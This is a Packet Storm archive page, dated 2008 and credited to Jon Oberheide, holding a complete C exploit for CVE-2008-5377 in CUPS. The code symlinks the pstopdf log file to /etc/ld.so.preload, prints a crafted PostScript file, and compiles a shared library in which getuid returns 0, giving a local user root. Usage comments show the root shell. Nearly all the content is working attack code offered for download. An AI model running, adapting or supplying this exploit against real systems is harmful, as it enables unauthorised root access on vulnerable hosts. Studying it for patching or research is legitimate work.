what you don't know can hurt you

CUPS Privilege Escalation Exploit

CUPS Privilege Escalation Exploit
Posted Dec 30, 2008
Authored by Jon Oberheide

CUPS versions below 1.3.8-4 privilege escalation exploit.

tags | exploit
advisories | CVE-2008-5377
MD5 | 5c4bf25869b83e37410764017074420f

CUPS Privilege Escalation Exploit

Change Mirror Download
/*
* cve-2008-5377.c
*
* CUPS < 1.3.8-4 pstopdf filter exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc cve-2008-5377.c -o cve-2008-5377.c
* $ ./cve-2008-5377
* $ id
* uid=0(root) gid=1000(vm) ...
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
*
* pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
* a symlink attack on the /tmp/pstopdf.log temporary file.
*
* Operation:
*
* The exploit creates and prints a malformed postscript document that will
* cause the CUPS pstopdf filter to write an error message out to its log
* file that contains the string /tmp/getuid.so. However, since we also
* symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
* error message and malicious shared library path will be appended to the
* ld.so.preload file, allowing us to elevate privileges to root.
*
* Note:
*
* This exploit only works under the (rare) conditions that cupsd executes
* external filters as a privileged user, a printer on the system uses the
* pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
* must be world readable.
*/

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int
main(void)
{
int ret;
FILE *fp;
struct stat log;

fp = fopen("/tmp/cve-2008-5377.ps", "w");
if(!fp) {
printf("error: cannot open /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
fclose(fp);

fp = fopen("/tmp/getuid.c", "w");
if(!fp) {
printf("error: cannot open /tmp/getuid.c\n");
goto cleanup;
}
fprintf(fp, "int getuid(){return 0;}\n");
fclose(fp);

ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
if (WEXITSTATUS(ret) != 0) {
printf("error: cannot compile /tmp/getuid.c\n");
goto cleanup;
}

unlink("/tmp/pstopdf.log");
ret = stat("/tmp/pstopdf.log", &log);
if (ret != -1) {

printf("error: /tmp/pstopdf.log already exists\n");
goto cleanup;
}

ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
if (ret == -1) {
printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
goto cleanup;
}

ret = system("lp < /tmp/cve-2008-5377.ps");
if (WEXITSTATUS(ret) != 0) {
printf("error: could not print /tmp/cve-2008-5377.ps\n");
goto cleanup;
}

cleanup:
unlink("/tmp/cve-2008-5377.ps");
unlink("/tmp/getuid.c");
return 0;
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    10 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close